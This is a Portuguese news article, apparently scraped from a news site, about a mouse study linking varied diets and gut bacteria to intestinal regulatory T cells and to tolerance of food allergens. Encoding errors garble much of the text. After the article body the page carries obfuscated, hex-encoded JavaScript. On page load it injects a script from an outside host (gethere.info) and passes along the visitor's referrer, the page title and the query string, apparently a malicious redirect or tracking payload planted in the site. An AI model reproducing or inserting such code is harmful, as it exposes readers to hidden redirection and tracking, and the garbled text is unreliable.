Home » Ciência » Estudo mostra que dieta sem restriA�A�es evita alergia alimentar

Estudo mostra que dieta sem restriA�A�es evita alergia alimentar

Experimento com ratos mostra que a ingestA?o de comidas variadas impede que as cA�lulas do intestino se “assustem” com um alimento estranho e o rejeitem. Segundo os cientistas, a diversidade nutricional deve ser estimulada desde os primeiros anos de vidaA tolerA?ncia a alimentos nA?o A� uma propriedade nata. O corpo humano a a�?aprendea�? nos primeiros anos de vida. A descoberta vem de um grupo de pesquisadores dos Estados Unidos e da Coreia do Sul apA?s experimentos com ratos para compreender mais a fundo as reaA�A�es alA�rgicas. O estudo, publicado recentemente na ediA�A?o on-line da revista Science, A� o primeiro a demonstrar que uma dieta normal estimula as cA�lulas do intestino a suprimir a rejeiA�A?o criada pelo sistema imune. A descoberta pode ajudar especialistas a compreender o fato de crianA�as com uma experiA?ncia nutricional menos diversificada serem mais suscetA�veis a alergias alimentares.

O trabalho concentrou-se numa populaA�A?o de cA�lulas T que se desenvolvem ao longo do consumo de novos alimentos, conhecidas como cA�lulas T regulatA?rias (Treg). Se elas nA?o existissem, o corpo trataria as macromolA�culas do alimento como estranhas, gerando uma sA�rie de reaA�A�es imunes indesejadas, o que desencadearia uma doenA�a inflamatA?ria generalizada. No intestino, essas estruturas sA?o chamadas cA�lulas regulatA?rias perifA�ricas, e se especializam em reconhecer alimentos e bactA�rias ligadas A� alimentaA�A?o

Quando nos acostumamos com um novo tipo de comida, o corpo estimula o desenvolvimento das estruturas imunossupressoras no sistema digestA?rio, bloqueando a resposta inadequada e a�?acostumandoa�? o organismo A�quele tipo de alimento. a�?O consumo de sA?lidos A� necessA?rio para induzir as condiA�A�es de tolerA?ncia imune do intestino que previnem a alergia alimentara�?, explica Charles Surh, pesquisador do Instituto de La Jolla de Alergia e Imunologia, na CalifA?rnia (Estados Unidos), e autor do trabalho.

Para mostrar como isso ocorre, os pesquisadores usaram ratos livres de antA�genos, modificados em laboratA?rio para representar um tipo de sistema imunolA?gico a�?em brancoa�?. Os bichos cresceram em um ambiente livre de germes e receberam dieta composta somente por aminoA?cidos, os blocos que formam as proteA�nas presentes nos alimentos. Esses componentes sA?o muito pequenos para serem detectados pelo sistema imune a�� portanto, nA?o eram reconhecidos como uma ameaA�a, o que acontece com as macromolA�culas. O sistema digestA?rio desses animais foi comparado ao de cobaias criadas com dieta e em ambiente normais.

Os cientistas notaram que o intestino delgado dos ratos livres de antA�genos nA?o tinha as cA�lulas Tregs, responsA?veis por educar o sistema imune, enquanto essa estrutura era bastante ativa no organismo dos animais comuns. Quando os animais sem as estruturas regulatA?rias foram expostos A� ovalbumina, proteA�na encontrada no ovo, eles sofreram uma sA�ria reaA�A?o alA�rgica e tiveram diarreia. A descoberta indicou aos pesquisadores que o consumo precoce de proteA�nas A� responsA?vel por estimular a produA�A?o dessas cA�lulas regulatA?rias, evitando alergias.

Esse processo foi observado no intestino dos ratos conforme eles eram desmamados e passavam a consumir alimentos ricos em proteA�na. Assim que a comida sA?lida passou a fazer parte da dieta dos animais, grandes populaA�A�es de cA�lulas Treg surgiram no organismo dos roedores. Para os pesquisadores, o leite materno e as cA�lulas regulatA?rias geradas pela introduA�A?o dos primeiros alimentos sA?lidos contribuem para a prevenA�A?o de alergias alimentares em crianA�as. a�?No inA�cio da vida, o ambiente intestinal A� mais inclinado a gerar uma resposta tolerogA?nica, provavelmente estimulado por componentes que induzem a tolerA?ncia ao leite e pela rA?pida geraA�A?o de cA�lulas Treg perifA�ricas a partir da introduA�A?o de alimentos sA?lidosa�?, apontou, em comunicado A� imprensa, Kwang Soon Kim, pesquisador da Academia de Imunologia e Microbiologia do Instituto de CiA?ncia BA?sica da Coreia do Sul.

Menos bactA�rias

O modelo tambA�m foi testado em outra populaA�A?o de ratos modificados que receberam uma dieta normal, mas foram criados num ambiente livre de germes. As restriA�A�es influenciaram o desenvolvimento do sistema imune dos animais, que contava com as Tregs induzidas pelos alimentos, mas nA?o com as geradas pelo contato com os micrA?bios. Os roedores sofreram reaA�A�es alA�rgicas ao comer a proteA�na do ovo, indicando que A� necessA?rio ter os dois tipos de populaA�A�es de cA�lulas regulatA?rias para evitar alergias alimentares.

a�?Uma das razA�es do crescimento da incidA?ncia de alergias alimentares A� o aumento da higiene e o uso prevalente de antibiA?ticos na sociedade moderna. Isso pode ter levado A� perda de algumas bactA�rias que ajudam na completa digestA?o dos alimentosa�?, afirma Surh. Ana Paula Moschione Castro, mA�dica assistente da unidade de alergia e imunologia do Instituto da CrianA�a do Hospital das ClA�nicas da Faculdade de Medicina da Universidade de SA?o Paulo (USP), analisa que os resultados do novo estudo reforA�am que as alergias alimentares tA?m origem complexa. a�?Esse estudo fala de uma combinaA�A?o de fatores. A microbiota A� um fator regulador importantA�ssimo do sistema imunolA?gico gastrointestinal, e a variedade da alimentaA�A?o tambA�ma�?, ressalta.

Para a especialista, os resultados do estudo com ratos nA?o podem ser considerados como uma referA?ncia do sistema imune de humanos, mas indicam o que alguns especialistas defendem: a restriA�A?o alimentar nA?o evita alergias. a�?Existem estudos mostrando que nA?o devemos evitar alimentos em crianA�as nA?o alA�rgicas pensando que isso vai prevenir alergias. A famA�lia deve proceder como com uma crianA�a normala�?, alerta Castro, que tambA�m integra a AssociaA�A?o Brasileira de Alergia e Imunologia.

Cuidado regular

Quando os ratos criados longe dos germes foram submetidos A� dieta de aminoA?cidos, o sistema imune deles tambA�m sofreu prejuA�zos. A populaA�A?o de Tregs perifA�ricas no intestino delgado desses animais caiu em 40% depois de um mA?s da alimentaA�A?o especial, indicando que a produA�A?o dessas estruturas regulatA?rias depende de um estA�mulo constante aos antA�genos introduzidos por meio dos alimentos. Os resultados mostram ainda como a dieta diversificada A� importante na manutenA�A?o de um sistema imune saudA?vel, e como a ingestA?o habitual dessas comidas pode evitar o desenvolvimento de alergias.

Os pesquisadores agora planejam limitar o estudo, examinando as reaA�A�es A�s comidas que geralmente causam reaA�A�es alA�rgicas, como amendoim e ovo. Dessa forma, esperam descobrir por que as pessoas sA?o mais propensas a desenvolver alergias contra esse tipo de alimentos. a�?A minha opiniA?o A� que as comidas que causam alergias sA?o provavelmente mais difA�ceis de digerira�?, diz Surh. a�?Isso A� porque pedaA�os que nA?o sA?o completamente digeridos tA?m maior tendA?ncia a causar respostas imunesa�?, argumenta o pesquisador.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Publicação: Redação Brasil (m)

Login

Perdeu sua senha?